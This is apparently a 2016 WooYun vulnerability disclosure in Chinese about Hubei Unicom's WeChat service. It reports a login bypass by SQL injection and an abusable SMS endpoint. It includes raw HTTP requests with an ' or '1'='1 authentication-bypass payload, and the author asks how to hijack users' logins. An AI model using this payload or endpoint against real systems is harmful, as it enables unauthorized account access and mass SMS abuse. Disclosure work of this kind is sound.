湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204973

漏洞标题：湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞作者： SoulHunter

提交时间：2016-05-04 18:30

修复时间：2016-06-20 17:40

公开时间：2016-06-20 17:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-04：细节已通知厂商并且等待厂商处理中
2016-05-06：厂商已经确认，细节仅向厂商公开
2016-05-16：细节向核心白帽子及相关领域专家公开
2016-05-26：细节向普通白帽子公开
2016-06-05：细节向实习白帽子公开
2016-06-20：细节向公众公开

简要描述：

详细说明：

问题出在这个地址：**.**.**.**:9988/
第一处是登录接口：

POST /userLogin.do?method=login HTTP/1.1
Host: **.**.**.**:9988
Proxy-Connection: keep-alive
Content-Length: 83
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:9988
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF%2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370; email=13888888888; password=13888888888; isstorePwd=yes
username=13888888888' or '1'='1&password=13888888888' or '1'='1

绕过验证
且存在sql注入问题。
第二处是：发送短信接口

POST /sellMain.do?method=sendmsg HTTP/1.1
Host: **.**.**.**:9988
Proxy-Connection: keep-alive
Content-Length: 24
Accept: text/plain, */*; q=0.01
Origin: http://**.**.**.**:9988
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**:9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004&phone=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: email=13339718222; password=111111; isstorePwd=no; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800
phone=13339718222

有没有大牛知道如何利用万能密码控制登录用户的。。我觉得应该可以做到。。求教！

漏洞证明：

然后可以利用短信接口给所有联通用户发流量包短信。。

修复方案：

过滤

版权声明：转载请注明来源 SoulHunter@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-06 17:30

厂商回复：

CNVD未复现所述情况，暂未列入处置流程。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204973

漏洞标题：湖北联通官方微信沃助手任意登录与2处SQL注入

相关厂商：湖北联通

漏洞作者： SoulHunter

提交时间：2016-05-04 18:30

修复时间：2016-06-20 17:40

公开时间：2016-06-20 17:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 SoulHunter@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204973

漏洞标题：湖北联通官方微信沃助手任意登录与2处SQL注入

相关厂商：湖北联通

漏洞作者： SoulHunter

提交时间：2016-05-04 18:30

修复时间：2016-06-20 17:40

公开时间：2016-06-20 17:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0204973"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 SoulHunter@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：